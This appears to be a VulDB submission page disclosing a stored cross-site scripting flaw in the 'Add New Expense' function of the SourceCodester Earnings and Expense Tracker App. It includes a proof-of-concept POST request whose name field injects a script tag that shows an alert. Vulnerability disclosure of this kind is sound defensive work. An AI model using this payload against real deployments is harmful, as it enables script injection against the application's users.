| 标题 | Earnings and Expense Tracker App Stored XSS Vulnerability |
|---|
| 描述 | Earnings and Expense Tracker App has a Stored XSS Vulnerability at its Add New Expense function, attackers can add a new expense with a malicous name , which will trigger XSS.
POC below:
POST /php-sqlite-expense-tracker/Master.php?a=save_expense HTTP/1.1
************************************************
formToken=%242y%2410%24Y9eGQHr93I.RCJ%2Fqynf7rO2avKfaTpEzdoliNgYgMrQlwBuDuUGOG&expense_id=&name=%3Cscript%3Ealert('haha')%3C%2Fscript%3E&amount=10 |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/16354/earnings-and-expense-tracker-app-using-php-and-sqlite3-source-code-free-download.html |
|---|
| 用户 | WWesleywww (UID 43117) |
|---|
| 提交 | 2023-03-28 14時14分 (3 年前) |
|---|
| 管理 | 2023-03-28 23時07分 (9 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 224307 [SourceCodester Earnings and Expense Tracker App 1.0 Master.php?a=save_expense 名称 跨网站脚本] |
|---|
| 积分 | 20 |
|---|